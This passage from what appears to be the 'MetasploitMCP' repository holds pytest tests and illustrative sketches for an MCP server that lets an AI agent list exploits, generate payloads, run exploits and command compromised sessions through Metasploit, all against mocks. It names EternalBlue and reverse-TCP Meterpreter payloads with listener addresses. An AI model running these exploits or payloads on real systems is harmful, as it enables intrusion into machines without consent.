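The cases in `tests/test_options_parsing.py` pin down the observable behavior expected of `_parse_options_gracefully`: dicts pass through, `None` and `""` yield an empty dict, digit-only values become `int`, `true`/`false` become `bool`, and everything else stays a string. The block below is a minimal sketch of a parser that would satisfy the cases shown above. It is not the implementation in `MetasploitMCP.py`: the name `parse_options_sketch`, the quote-stripping rule, and the `ValueError` raised when a pair has no `=` are assumptions made for illustration.

```python
from typing import Any, Dict, Union


def parse_options_sketch(raw: Union[Dict[str, Any], str, None]) -> Dict[str, Any]:
    """Hypothetical stand-in for _parse_options_gracefully (illustration only)."""
    if raw is None or raw == "":
        return {}
    if isinstance(raw, dict):
        return raw  # dicts pass through unchanged

    parsed: Dict[str, Any] = {}
    for pair in raw.split(","):
        if "=" not in pair:
            # Assumption: a pair without '=' is treated as a format error.
            raise ValueError(f"Expected key=value, got {pair!r}")
        key, value = pair.split("=", 1)
        key, value = key.strip(), value.strip()
        # Assumption: one pair of matching surrounding quotes is stripped.
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        if value.lower() in ("true", "false"):
            parsed[key] = value.lower() == "true"
        elif value.isdecimal():
            parsed[key] = int(value)  # digits only; negatives stay strings here
        else:
            parsed[key] = value
    return parsed


print(parse_options_sketch("LHOST=192.168.1.100,LPORT=4444,SSL=true"))
```

Because the sketch splits on every comma, a value that itself contains a comma would be cut in two; a real parser would need quoting-aware splitting for that case.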
--------------------------------------------------------------------------------
/tests/test_helpers.py:
--------------------------------------------------------------------------------
```python
1 | #!/usr/bin/env python3
2 | """
3 | Unit tests for helper functions in MetasploitMCP.
4 | """
5 |
6 | import pytest
7 | import sys
8 | import os
9 | import asyncio
10 | from unittest.mock import Mock, patch, AsyncMock, MagicMock
11 | from typing import Dict, Any
12 |
13 | # Add the parent directory to the path to import MetasploitMCP
14 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
15 |
16 | # Mock the dependencies that aren't available in the test environment
17 | sys.modules['uvicorn'] = Mock()
18 | sys.modules['fastapi'] = Mock()
19 | sys.modules['mcp.server.fastmcp'] = Mock()
20 | sys.modules['mcp.server.sse'] = Mock()
21 | sys.modules['pymetasploit3.msfrpc'] = Mock()
22 | sys.modules['starlette.applications'] = Mock()
23 | sys.modules['starlette.routing'] = Mock()
24 | sys.modules['mcp.server.session'] = Mock()
25 |
26 | # Create mock classes for MSF objects
27 | class MockMsfRpcClient:
28 | def __init__(self):
29 | self.modules = Mock()
30 | self.core = Mock()
31 | self.sessions = Mock()
32 | self.jobs = Mock()
33 | self.consoles = Mock()
34 |
35 | class MockMsfConsole:
36 | def __init__(self, cid='test-console-id'):
37 | self.cid = cid
38 |
39 | def read(self):
40 | return {'data': 'test output', 'prompt': 'msf6 > ', 'busy': False}
41 |
42 | def write(self, command):
43 | return True
44 |
45 | class MockMsfRpcError(Exception):
46 | pass
47 |
48 | # Patch the MSF modules
49 | sys.modules['pymetasploit3.msfrpc'].MsfRpcClient = MockMsfRpcClient
50 | sys.modules['pymetasploit3.msfrpc'].MsfConsole = MockMsfConsole
51 | sys.modules['pymetasploit3.msfrpc'].MsfRpcError = MockMsfRpcError
52 |
53 | # Import after mocking
54 | from MetasploitMCP import (
55 | _get_module_object, _set_module_options, initialize_msf_client,
56 | get_msf_client, get_msf_console, run_command_safely,
57 | find_available_port
58 | )
59 |
60 |
61 | class TestMsfClientFunctions:
62 | """Test MSF client initialization and management functions."""
63 |
64 | @patch('MetasploitMCP.MSF_PASSWORD', 'test-password')
65 | @patch('MetasploitMCP.MSF_SERVER', '127.0.0.1')
66 | @patch('MetasploitMCP.MSF_PORT_STR', '55553')
67 | @patch('MetasploitMCP.MSF_SSL_STR', 'false')
68 | def test_initialize_msf_client_success(self):
69 | """Test successful MSF client initialization."""
70 | with patch('MetasploitMCP._msf_client_instance', None):
71 | with patch('MetasploitMCP.MsfRpcClient') as mock_client_class:
72 | mock_client = Mock()
73 | mock_client.core.version = {'version': '6.3.0'}
74 | mock_client_class.return_value = mock_client
75 |
76 | result = initialize_msf_client()
77 |
78 | assert result is mock_client
79 | mock_client_class.assert_called_once_with(
80 | password='test-password',
81 | server='127.0.0.1',
82 | port=55553,
83 | ssl=False
84 | )
85 |
86 | @patch('MetasploitMCP.MSF_PORT_STR', 'invalid-port')
87 | def test_initialize_msf_client_invalid_port(self):
88 | """Test MSF client initialization with invalid port."""
89 | with patch('MetasploitMCP._msf_client_instance', None):
90 | with pytest.raises(ValueError, match="Invalid MSF connection parameters"):
91 | initialize_msf_client()
92 |
93 | def test_get_msf_client_not_initialized(self):
94 | """Test get_msf_client when client not initialized."""
95 | with patch('MetasploitMCP._msf_client_instance', None):
96 | with pytest.raises(ConnectionError, match="not been initialized"):
97 | get_msf_client()
98 |
99 | def test_get_msf_client_initialized(self):
100 | """Test get_msf_client when client is initialized."""
101 | mock_client = Mock()
102 | with patch('MetasploitMCP._msf_client_instance', mock_client):
103 | result = get_msf_client()
104 | assert result is mock_client
105 |
106 |
107 | class TestGetModuleObject:
108 | """Test the _get_module_object helper function."""
109 |
110 | @pytest.fixture
111 | def mock_client(self):
112 | """Fixture providing a mock MSF client."""
113 | client = Mock()
114 | with patch('MetasploitMCP.get_msf_client', return_value=client):
115 | yield client
116 |
117 | @pytest.mark.asyncio
118 | async def test_get_module_object_success(self, mock_client):
119 | """Test successful module object retrieval."""
120 | mock_module = Mock()
121 | mock_client.modules.use.return_value = mock_module
122 |
123 | result = await _get_module_object('exploit', 'windows/smb/ms17_010_eternalblue')
124 |
125 | assert result is mock_module
126 | mock_client.modules.use.assert_called_once_with('exploit', 'windows/smb/ms17_010_eternalblue')
127 |
128 | @pytest.mark.asyncio
129 | async def test_get_module_object_full_path(self, mock_client):
130 | """Test module object retrieval with full path."""
131 | mock_module = Mock()
132 | mock_client.modules.use.return_value = mock_module
133 |
134 | result = await _get_module_object('exploit', 'exploit/windows/smb/ms17_010_eternalblue')
135 |
136 | assert result is mock_module
137 | # Should strip the module type prefix
138 | mock_client.modules.use.assert_called_once_with('exploit', 'windows/smb/ms17_010_eternalblue')
139 |
140 | @pytest.mark.asyncio
141 | async def test_get_module_object_not_found(self, mock_client):
142 | """Test module object retrieval when module not found."""
143 | mock_client.modules.use.side_effect = KeyError("Module not found")
144 |
145 | with pytest.raises(ValueError, match="not found"):
146 | await _get_module_object('exploit', 'nonexistent/module')
147 |
148 | @pytest.mark.asyncio
149 | async def test_get_module_object_msf_error(self, mock_client):
150 | """Test module object retrieval with MSF RPC error."""
151 | mock_client.modules.use.side_effect = MockMsfRpcError("RPC Error")
152 |
153 | with pytest.raises(MockMsfRpcError, match="RPC Error"):
154 | await _get_module_object('exploit', 'test/module')
155 |
156 |
157 | class TestSetModuleOptions:
158 | """Test the _set_module_options helper function."""
159 |
160 | @pytest.fixture
161 | def mock_module(self):
162 | """Fixture providing a mock module object."""
163 | module = Mock()
164 | module.fullname = 'exploit/test/module'
165 | module.__setitem__ = Mock()
166 | return module
167 |
168 | @pytest.mark.asyncio
169 | async def test_set_module_options_basic(self, mock_module):
170 | """Test basic option setting."""
171 | options = {'RHOSTS': '192.168.1.1', 'RPORT': '80'}
172 |
173 | await _set_module_options(mock_module, options)
174 |
175 | # Should be called twice, once for each option
176 | assert mock_module.__setitem__.call_count == 2
177 | mock_module.__setitem__.assert_any_call('RHOSTS', '192.168.1.1')
178 | mock_module.__setitem__.assert_any_call('RPORT', 80) # Type conversion: '80' -> 80
179 |
180 | @pytest.mark.asyncio
181 | async def test_set_module_options_type_conversion(self, mock_module):
182 | """Test option setting with type conversion."""
183 | options = {
184 | 'RPORT': '80', # String number -> int
185 | 'SSL': 'true', # String boolean -> bool
186 | 'VERBOSE': 'false', # String boolean -> bool
187 | 'THREADS': '10' # String number -> int
188 | }
189 |
190 | await _set_module_options(mock_module, options)
191 |
192 | # Verify type conversions
193 | calls = mock_module.__setitem__.call_args_list
194 | call_dict = {call[0][0]: call[0][1] for call in calls}
195 |
196 | assert call_dict['RPORT'] == 80
197 | assert call_dict['SSL'] is True
198 | assert call_dict['VERBOSE'] is False
199 | assert call_dict['THREADS'] == 10
200 |
201 | @pytest.mark.asyncio
202 | async def test_set_module_options_error(self, mock_module):
203 | """Test option setting with error."""
204 | mock_module.__setitem__.side_effect = KeyError("Invalid option")
205 | options = {'INVALID_OPT': 'value'}
206 |
207 | with pytest.raises(ValueError, match="Failed to set option"):
208 | await _set_module_options(mock_module, options)
209 |
210 |
211 | class TestGetMsfConsole:
212 | """Test the get_msf_console context manager."""
213 |
214 | @pytest.fixture
215 | def mock_client(self):
216 | """Fixture providing a mock MSF client."""
217 | client = Mock()
218 | with patch('MetasploitMCP.get_msf_client', return_value=client):
219 | yield client
220 |
221 | @pytest.mark.asyncio
222 | async def test_get_msf_console_success(self, mock_client):
223 | """Test successful console creation and cleanup."""
224 | mock_console = MockMsfConsole('test-console-123')
225 | mock_client.consoles.console.return_value = mock_console
226 | mock_client.consoles.destroy.return_value = 'destroyed'
227 |
228 | # Mock the global client instance for cleanup
229 | with patch('MetasploitMCP._msf_client_instance', mock_client):
230 | async with get_msf_console() as console:
231 | assert console is mock_console
232 | assert console.cid == 'test-console-123'
233 |
234 | # Verify cleanup was called
235 | mock_client.consoles.destroy.assert_called_once_with('test-console-123')
236 |
237 | @pytest.mark.asyncio
238 | async def test_get_msf_console_creation_error(self, mock_client):
239 | """Test console creation error handling."""
240 | mock_client.consoles.console.side_effect = MockMsfRpcError("Console creation failed")
241 |
242 | with pytest.raises(MockMsfRpcError, match="Console creation failed"):
243 | async with get_msf_console():
244 | pass
245 |
246 | @pytest.mark.asyncio
247 | async def test_get_msf_console_cleanup_error(self, mock_client):
248 | """Test that cleanup errors don't propagate."""
249 | mock_console = MockMsfConsole('test-console-123')
250 | mock_client.consoles.console.return_value = mock_console
251 | mock_client.consoles.destroy.side_effect = Exception("Cleanup failed")
252 |
253 | # Should not raise exception even if cleanup fails
254 | async with get_msf_console() as console:
255 | assert console is mock_console
256 |
257 |
258 | class TestRunCommandSafely:
259 | """Test the run_command_safely function."""
260 |
261 | @pytest.fixture
262 | def mock_console(self):
263 | """Fixture providing a mock console."""
264 | console = Mock()
265 | console.write = Mock()
266 | console.read = Mock()
267 | return console
268 |
269 | @pytest.mark.asyncio
270 | async def test_run_command_safely_basic(self, mock_console):
271 | """Test basic command execution."""
272 | # Mock console read to return prompt immediately
273 | mock_console.read.return_value = {
274 | 'data': 'command output\n',
275 | 'prompt': '\x01\x02msf6\x01\x02 \x01\x02> \x01\x02',
276 | 'busy': False
277 | }
278 |
279 | result = await run_command_safely(mock_console, 'help')
280 |
281 | mock_console.write.assert_called_once_with('help\n')
282 | assert 'command output' in result
283 |
284 | @pytest.mark.asyncio
285 | async def test_run_command_safely_invalid_console(self, mock_console):
286 | """Test command execution with invalid console."""
287 | # Remove required methods
288 | delattr(mock_console, 'write')
289 |
290 | with pytest.raises(TypeError, match="Unsupported console object"):
291 | await run_command_safely(mock_console, 'help')
292 |
293 | @pytest.mark.asyncio
294 | async def test_run_command_safely_read_error(self, mock_console):
295 | """Test command execution with read error - should time out gracefully."""
296 | mock_console.read.side_effect = Exception("Read failed")
297 |
298 | # Should not raise an exception, but time out and return an empty result
299 | result = await run_command_safely(mock_console, 'help')
300 |
301 | # Should return empty string after timeout
302 | assert isinstance(result, str)
303 | assert result == "" # Empty result after timeout
304 |
305 |
306 | class TestFindAvailablePort:
307 | """Test the find_available_port utility function."""
308 |
309 | def test_find_available_port_success(self):
310 | """Test finding an available port."""
311 | # This should succeed as it tests real socket binding
312 | port = find_available_port(8080, max_attempts=5)
313 | assert isinstance(port, int)
314 | assert 8080 <= port < 8085
315 |
316 | @patch('socket.socket')
317 | def test_find_available_port_all_busy(self, mock_socket_class):
318 | """Test when all ports in range are busy."""
319 | mock_socket = Mock()
320 | mock_socket_class.return_value.__enter__.return_value = mock_socket
321 | mock_socket.bind.side_effect = OSError("Port in use")
322 |
323 | # Should return the start port as fallback
324 | port = find_available_port(8080, max_attempts=3)
325 | assert port == 8080
326 |
327 | @patch('socket.socket')
328 | def test_find_available_port_second_attempt(self, mock_socket_class):
329 | """Test finding port on second attempt."""
330 | mock_socket = Mock()
331 | mock_socket_class.return_value.__enter__.return_value = mock_socket
332 |
333 | # First call fails, second succeeds
334 | mock_socket.bind.side_effect = [OSError("Port in use"), None]
335 |
336 | port = find_available_port(8080, max_attempts=3)
337 | assert port == 8081
338 |
339 |
340 | if __name__ == "__main__":
341 | pytest.main([__file__, "-v"])
342 |
```
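The `TestFindAvailablePort` cases imply a simple probing loop: try to bind each port in `[start_port, start_port + max_attempts)`, return the first one that binds, and fall back to `start_port` when every attempt fails. The block below is a minimal sketch consistent with those three tests. It is not copied from `MetasploitMCP.py`; the name `find_available_port_sketch`, the `host` parameter, and the default of 10 attempts are hypothetical.

```python
import socket


def find_available_port_sketch(start_port: int,
                               host: str = "127.0.0.1",
                               max_attempts: int = 10) -> int:
    """Hypothetical port probe mirroring the behavior the tests expect."""
    for port in range(start_port, start_port + max_attempts):
        try:
            # The socket is used as a context manager so it is always closed,
            # which matches how the tests mock socket.socket().__enter__().
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                sock.bind((host, port))
                return port
        except OSError:
            continue  # port busy or not permitted; try the next one
    # Fallback assumed from test_find_available_port_all_busy
    return start_port


print(find_available_port_sketch(8080, max_attempts=5))
```

A successful bind only shows the port was free at the moment of the check. Another process can take it before the caller binds again, so the result is best treated as a hint.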
--------------------------------------------------------------------------------
/tests/test_tools_integration.py:
--------------------------------------------------------------------------------
```python
1 | #!/usr/bin/env python3
2 | """
3 | Integration tests for MCP tools in MetasploitMCP.
4 | These tests mock the Metasploit backend but test the full tool workflows.
5 | """
6 |
7 | import pytest
8 | import sys
9 | import os
10 | import asyncio
11 | from unittest.mock import Mock, patch, AsyncMock, MagicMock
12 | from typing import Dict, Any
13 |
14 | # Add the parent directory to the path to import MetasploitMCP
15 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
16 |
17 | # Mock the dependencies that aren't available in the test environment
18 | sys.modules['uvicorn'] = Mock()
19 | sys.modules['fastapi'] = Mock()
20 | sys.modules['starlette.applications'] = Mock()
21 | sys.modules['starlette.routing'] = Mock()
22 |
23 | # Create a special mock for FastMCP that preserves the tool decorator behavior
24 | class MockFastMCP:
25 | def __init__(self, *args, **kwargs):
26 | pass
27 |
28 | def tool(self):
29 | # Return a decorator that just returns the original function
30 | def decorator(func):
31 | return func
32 | return decorator
33 |
34 | # Mock the MCP modules with our custom FastMCP
35 | mcp_server_fastmcp = Mock()
36 | mcp_server_fastmcp.FastMCP = MockFastMCP
37 | sys.modules['mcp.server.fastmcp'] = mcp_server_fastmcp
38 | sys.modules['mcp.server.sse'] = Mock()
39 | sys.modules['mcp.server.session'] = Mock()
40 |
41 | # Mock pymetasploit3 module
42 | sys.modules['pymetasploit3.msfrpc'] = Mock()
43 |
44 | # Create comprehensive mock classes
45 | class MockMsfRpcClient:
46 | def __init__(self):
47 | self.modules = Mock()
48 | self.core = Mock()
49 | self.sessions = Mock()
50 | self.jobs = Mock()
51 | self.consoles = Mock()
52 |
53 | # Setup default behaviors
54 | self.core.version = {'version': '6.3.0'}
55 | # These are properties that return lists
56 | self.modules.exploits = ['windows/smb/ms17_010_eternalblue', 'unix/ftp/vsftpd_234_backdoor']
57 | self.modules.payloads = ['windows/meterpreter/reverse_tcp', 'linux/x86/shell/reverse_tcp']
58 | # These are methods that return dicts
59 | self.sessions.list = Mock(return_value={})
60 | self.jobs.list = Mock(return_value={})
61 |
62 | class MockMsfConsole:
63 | def __init__(self, cid='test-console-id'):
64 | self.cid = cid
65 | self._command_history = []
66 |
67 | def read(self):
68 | return {'data': 'msf6 > ', 'prompt': '\x01\x02msf6\x01\x02 \x01\x02> \x01\x02', 'busy': False}
69 |
70 | def write(self, command):
71 | self._command_history.append(command.strip())
72 | return True
73 |
74 | class MockMsfModule:
75 | def __init__(self, fullname):
76 | self.fullname = fullname
77 | self.options = {}
78 | # Use a plain dict for runoptions so item assignment (__setitem__) works
79 | self.runoptions = {}
80 | self.missing_required = []
81 |
82 | def __setitem__(self, key, value):
83 | self.options[key] = value
84 |
85 | def execute(self, payload=None):
86 | return {
87 | 'job_id': 1234,
88 | 'uuid': 'test-uuid-123',
89 | 'error': False
90 | }
91 |
92 | def payload_generate(self):
93 | return b"test_payload_bytes"
94 |
95 | class MockMsfRpcError(Exception):
96 | pass
97 |
98 | # Apply mocks
99 | sys.modules['pymetasploit3.msfrpc'].MsfRpcClient = MockMsfRpcClient
100 | sys.modules['pymetasploit3.msfrpc'].MsfConsole = MockMsfConsole
101 | sys.modules['pymetasploit3.msfrpc'].MsfRpcError = MockMsfRpcError
102 |
103 | # Import the module and then get the actual functions
104 | import MetasploitMCP
105 |
106 | # Get the actual functions (not mocked)
107 | list_exploits = MetasploitMCP.list_exploits
108 | list_payloads = MetasploitMCP.list_payloads
109 | generate_payload = MetasploitMCP.generate_payload
110 | run_exploit = MetasploitMCP.run_exploit
111 | run_post_module = MetasploitMCP.run_post_module
112 | run_auxiliary_module = MetasploitMCP.run_auxiliary_module
113 | list_active_sessions = MetasploitMCP.list_active_sessions
114 | send_session_command = MetasploitMCP.send_session_command
115 | start_listener = MetasploitMCP.start_listener
116 | stop_job = MetasploitMCP.stop_job
117 | terminate_session = MetasploitMCP.terminate_session
118 |
119 |
120 | class TestExploitListingTools:
121 | """Test tools for listing exploits and payloads."""
122 |
123 | @pytest.fixture
124 | def mock_client(self):
125 | """Fixture providing a mock MSF client."""
126 | client = MockMsfRpcClient()
127 | with patch('MetasploitMCP.get_msf_client', return_value=client):
128 | yield client
129 |
130 | @pytest.mark.asyncio
131 | async def test_list_exploits_no_filter(self, mock_client):
132 | """Test listing exploits without filter."""
133 | mock_client.modules.exploits = [
134 | 'windows/smb/ms17_010_eternalblue',
135 | 'unix/ftp/vsftpd_234_backdoor',
136 | 'windows/http/iis_webdav_upload_asp'
137 | ]
138 |
139 | result = await list_exploits()
140 |
141 | assert isinstance(result, list)
142 | assert len(result) == 3
143 | assert 'windows/smb/ms17_010_eternalblue' in result
144 |
145 | @pytest.mark.asyncio
146 | async def test_list_exploits_with_filter(self, mock_client):
147 | """Test listing exploits with search term."""
148 | mock_client.modules.exploits = [
149 | 'windows/smb/ms17_010_eternalblue',
150 | 'unix/ftp/vsftpd_234_backdoor',
151 | 'windows/smb/ms08_067_netapi'
152 | ]
153 |
154 | result = await list_exploits("smb")
155 |
156 | assert isinstance(result, list)
157 | assert len(result) == 2
158 | assert all('smb' in exploit.lower() for exploit in result)
159 |
160 | @pytest.mark.asyncio
161 | async def test_list_exploits_error(self, mock_client):
162 | """Test listing exploits with MSF error."""
163 | mock_client.modules.exploits = Mock(side_effect=MockMsfRpcError("Connection failed"))
164 |
165 | result = await list_exploits()
166 |
167 | assert isinstance(result, list)
168 | assert len(result) == 1
169 | assert "Error" in result[0]
170 |
171 | @pytest.mark.asyncio
172 | async def test_list_exploits_timeout(self, mock_client):
173 | """Test listing exploits with timeout."""
174 | import asyncio
175 |
176 | def slow_exploits():
177 | # Simulate a slow response that would time out
178 | import time
179 | time.sleep(35) # Longer than RPC_CALL_TIMEOUT (30s)
180 | return ['exploit1', 'exploit2']
181 |
182 | mock_client.modules.exploits = slow_exploits
183 |
184 | result = await list_exploits()
185 |
186 | assert isinstance(result, list)
187 | assert len(result) == 1
188 | assert "Timeout" in result[0]
189 | assert "30" in result[0] # Should mention the timeout duration
190 |
191 | @pytest.mark.asyncio
192 | async def test_list_payloads_no_filter(self, mock_client):
193 | """Test listing payloads without filter."""
194 | mock_client.modules.payloads = [
195 | 'windows/meterpreter/reverse_tcp',
196 | 'linux/x86/shell/reverse_tcp',
197 | 'windows/shell/reverse_tcp'
198 | ]
199 |
200 | result = await list_payloads()
201 |
202 | assert isinstance(result, list)
203 | assert len(result) == 3
204 |
205 | @pytest.mark.asyncio
206 | async def test_list_payloads_with_platform_filter(self, mock_client):
207 | """Test listing payloads with platform filter."""
208 | mock_client.modules.payloads = [
209 | 'windows/meterpreter/reverse_tcp',
210 | 'linux/x86/shell/reverse_tcp',
211 | 'windows/shell/reverse_tcp'
212 | ]
213 |
214 | result = await list_payloads(platform="windows")
215 |
216 | assert isinstance(result, list)
217 | assert len(result) == 2
218 | assert all('windows' in payload.lower() for payload in result)
219 |
220 | @pytest.mark.asyncio
221 | async def test_list_payloads_with_arch_filter(self, mock_client):
222 | """Test listing payloads with architecture filter."""
223 | mock_client.modules.payloads = [
224 | 'windows/meterpreter/reverse_tcp',
225 | 'linux/x86/shell/reverse_tcp',
226 | 'windows/x64/meterpreter/reverse_tcp'
227 | ]
228 |
229 | result = await list_payloads(arch="x86")
230 |
231 | assert isinstance(result, list)
232 | assert len(result) == 1
233 | assert 'x86' in result[0]
234 |
235 |
236 | class TestPayloadGeneration:
237 | """Test payload generation functionality."""
238 |
239 | @pytest.fixture
240 | def mock_client_and_module(self):
241 | """Fixture providing mocked client and module."""
242 | client = MockMsfRpcClient()
243 | module = MockMsfModule('payload/windows/meterpreter/reverse_tcp')
244 |
245 | with patch('MetasploitMCP.get_msf_client', return_value=client):
246 | with patch('MetasploitMCP._get_module_object', return_value=module):
247 | with patch('MetasploitMCP.PAYLOAD_SAVE_DIR', '/tmp/test'):
248 | with patch('os.makedirs'):
249 | with patch('builtins.open', create=True) as mock_open:
250 | mock_open.return_value.__enter__.return_value.write = Mock()
251 | yield client, module
252 |
253 | @pytest.mark.asyncio
254 | async def test_generate_payload_dict_options(self, mock_client_and_module):
255 | """Test payload generation with dictionary options."""
256 | client, module = mock_client_and_module
257 |
258 | options = {"LHOST": "192.168.1.100", "LPORT": 4444}
259 | result = await generate_payload(
260 | payload_type="windows/meterpreter/reverse_tcp",
261 | format_type="exe",
262 | options=options
263 | )
264 |
265 | assert result["status"] == "success"
266 | assert "server_save_path" in result
267 | assert result["payload_size"] == len(b"test_payload_bytes")
268 |
269 | @pytest.mark.asyncio
270 | async def test_generate_payload_string_options(self, mock_client_and_module):
271 | """Test payload generation with string options."""
272 | client, module = mock_client_and_module
273 |
274 | options = "LHOST=192.168.1.100,LPORT=4444"
275 | result = await generate_payload(
276 | payload_type="windows/meterpreter/reverse_tcp",
277 | format_type="exe",
278 | options=options
279 | )
280 |
281 | assert result["status"] == "success"
282 | # Verify the options were parsed correctly
283 | assert module.options["LHOST"] == "192.168.1.100"
284 | assert module.options["LPORT"] == 4444
285 |
286 | @pytest.mark.asyncio
287 | async def test_generate_payload_empty_options(self, mock_client_and_module):
288 | """Test payload generation with empty options."""
289 | client, module = mock_client_and_module
290 |
291 | result = await generate_payload(
292 | payload_type="windows/meterpreter/reverse_tcp",
293 | format_type="exe",
294 | options={}
295 | )
296 |
297 | assert result["status"] == "error"
298 | assert "required" in result["message"]
299 |
300 | @pytest.mark.asyncio
301 | async def test_generate_payload_invalid_string_options(self, mock_client_and_module):
302 | """Test payload generation with invalid string options."""
303 | client, module = mock_client_and_module
304 |
305 | result = await generate_payload(
306 | payload_type="windows/meterpreter/reverse_tcp",
307 | format_type="exe",
308 | options="LHOST192.168.1.100" # Missing equals
309 | )
310 |
311 | assert result["status"] == "error"
312 | assert "Invalid options format" in result["message"]
313 |
314 |
315 | class TestExploitExecution:
316 | """Test exploit execution functionality."""
317 |
318 | @pytest.fixture
319 | def mock_exploit_environment(self):
320 | """Fixture providing mocked exploit execution environment."""
321 | client = MockMsfRpcClient()
322 | module = MockMsfModule('exploit/windows/smb/ms17_010_eternalblue')
323 |
324 | with patch('MetasploitMCP.get_msf_client', return_value=client):
325 | with patch('MetasploitMCP._execute_module_rpc') as mock_rpc:
326 | with patch('MetasploitMCP._execute_module_console') as mock_console:
327 | mock_rpc.return_value = {
328 | "status": "success",
329 | "message": "Exploit executed",
330 | "job_id": 1234,
331 | "session_id": 5678
332 | }
333 | mock_console.return_value = {
334 | "status": "success",
335 | "message": "Exploit executed via console",
336 | "module_output": "Session 1 opened"
337 | }
338 | yield client, mock_rpc, mock_console
339 |
340 | @pytest.mark.asyncio
341 | async def test_run_exploit_dict_payload_options(self, mock_exploit_environment):
342 | """Test exploit execution with dictionary payload options."""
343 | client, mock_rpc, mock_console = mock_exploit_environment
344 |
345 | result = await run_exploit(
346 | module_name="windows/smb/ms17_010_eternalblue",
347 | options={"RHOSTS": "192.168.1.1"},
348 | payload_name="windows/meterpreter/reverse_tcp",
349 | payload_options={"LHOST": "192.168.1.100", "LPORT": 4444},
350 | run_as_job=True
351 | )
352 |
353 | assert result["status"] == "success"
354 | mock_rpc.assert_called_once()
355 |
356 | @pytest.mark.asyncio
357 | async def test_run_exploit_string_payload_options(self, mock_exploit_environment):
358 | """Test exploit execution with string payload options."""
359 | client, mock_rpc, mock_console = mock_exploit_environment
360 |
361 | result = await run_exploit(
362 | module_name="windows/smb/ms17_010_eternalblue",
363 | options={"RHOSTS": "192.168.1.1"},
364 | payload_name="windows/meterpreter/reverse_tcp",
365 | payload_options="LHOST=192.168.1.100,LPORT=4444",
366 | run_as_job=True
367 | )
368 |
369 | assert result["status"] == "success"
370 | # Verify RPC was called with parsed options
371 | call_args = mock_rpc.call_args
372 | payload_spec = call_args[1]['payload_spec']
373 | assert payload_spec['options']['LHOST'] == "192.168.1.100"
374 | assert payload_spec['options']['LPORT'] == 4444
375 |
376 | @pytest.mark.asyncio
377 | async def test_run_exploit_invalid_payload_options(self, mock_exploit_environment):
378 | """Test exploit execution with invalid payload options."""
379 | client, mock_rpc, mock_console = mock_exploit_environment
380 |
381 | result = await run_exploit(
382 | module_name="windows/smb/ms17_010_eternalblue",
383 | options={"RHOSTS": "192.168.1.1"},
384 | payload_name="windows/meterpreter/reverse_tcp",
385 | payload_options="LHOST192.168.1.100", # Invalid format
386 | run_as_job=True
387 | )
388 |
389 | assert result["status"] == "error"
390 | assert "Invalid payload_options format" in result["message"]
391 |
392 | @pytest.mark.asyncio
393 | async def test_run_exploit_console_mode(self, mock_exploit_environment):
394 | """Test exploit execution in console mode."""
395 | client, mock_rpc, mock_console = mock_exploit_environment
396 |
397 | result = await run_exploit(
398 | module_name="windows/smb/ms17_010_eternalblue",
399 | options={"RHOSTS": "192.168.1.1"},
400 | payload_name="windows/meterpreter/reverse_tcp",
401 | payload_options={"LHOST": "192.168.1.100", "LPORT": 4444},
402 | run_as_job=False # Console mode
403 | )
404 |
405 | assert result["status"] == "success"
406 | mock_console.assert_called_once()
407 | mock_rpc.assert_not_called()
408 |
409 |
410 | class TestSessionManagement:
411 | """Test session management functionality."""
412 |
413 | @pytest.fixture
414 | def mock_session_environment(self):
415 | """Fixture providing mocked session management environment."""
416 | client = MockMsfRpcClient()
417 | session = Mock()
418 | session.run_with_output = Mock(return_value="command output")
419 | session.read = Mock(return_value="session data")
420 | session.write = Mock()
421 | session.stop = Mock()
422 |
423 | # Override the default Mock with actual dict return values
424 | client.sessions.list = Mock(return_value={
425 | "1": {"type": "meterpreter", "info": "Windows session"},
426 | "2": {"type": "shell", "info": "Linux session"}
427 | })
428 | client.sessions.session = Mock(return_value=session)
429 |
430 | with patch('MetasploitMCP.get_msf_client', return_value=client):
431 | yield client, session
432 |
433 | @pytest.mark.asyncio
434 | async def test_list_active_sessions(self, mock_session_environment):
435 | """Test listing active sessions."""
436 | client, session = mock_session_environment
437 |
438 | result = await list_active_sessions()
439 |
440 | assert result["status"] == "success"
441 | assert result["count"] == 2
442 | assert "1" in result["sessions"]
443 | assert "2" in result["sessions"]
444 |
445 | @pytest.mark.asyncio
446 | async def test_send_session_command_meterpreter(self, mock_session_environment):
447 | """Test sending command to Meterpreter session."""
448 | client, session = mock_session_environment
449 |
450 | result = await send_session_command(1, "sysinfo")
451 |
452 | assert result["status"] == "success"
453 | session.run_with_output.assert_called_once_with("sysinfo")
454 |
455 | @pytest.mark.asyncio
456 | async def test_send_session_command_nonexistent(self, mock_session_environment):
457 | """Test sending command to non-existent session."""
458 | client, session = mock_session_environment
459 | client.sessions.list.return_value = {} # No sessions
460 |
461 | result = await send_session_command(999, "whoami")
462 |
463 | assert result["status"] == "error"
464 | assert "not found" in result["message"]
465 |
466 | @pytest.mark.asyncio
467 | async def test_terminate_session(self, mock_session_environment):
468 | """Test session termination."""
469 | client, session = mock_session_environment
470 |
471 | # Mock session disappearing after termination
472 | client.sessions.list.side_effect = [
473 | {"1": {"type": "meterpreter"}}, # Before termination
474 | {} # After termination
475 | ]
476 |
477 | result = await terminate_session(1)
478 |
479 | assert result["status"] == "success"
480 | session.stop.assert_called_once()
481 |
482 |
483 | class TestListenerManagement:
484 | """Test listener and job management functionality."""
485 |
486 | @pytest.fixture
487 | def mock_job_environment(self):
488 | """Fixture providing mocked job management environment."""
489 | client = MockMsfRpcClient()
490 |
491 | # Override the default Mock with actual dict return values
492 | client.jobs.list = Mock(return_value={})
493 | client.jobs.stop = Mock(return_value="stopped")
494 |
495 | with patch('MetasploitMCP.get_msf_client', return_value=client):
496 | with patch('MetasploitMCP._execute_module_rpc') as mock_rpc:
497 | mock_rpc.return_value = {
498 | "status": "success",
499 | "job_id": 1234,
500 | "message": "Listener started"
501 | }
502 | yield client, mock_rpc
503 |
504 | @pytest.mark.asyncio
505 | async def test_start_listener_dict_options(self, mock_job_environment):
506 | """Test starting listener with dictionary additional options."""
507 | client, mock_rpc = mock_job_environment
508 |
509 | result = await start_listener(
510 | payload_type="windows/meterpreter/reverse_tcp",
511 | lhost="192.168.1.100",
512 | lport=4444,
513 | additional_options={"ExitOnSession": True}
514 | )
515 |
516 | assert result["status"] == "success"
517 | assert "job" in result["message"]
518 |
519 | @pytest.mark.asyncio
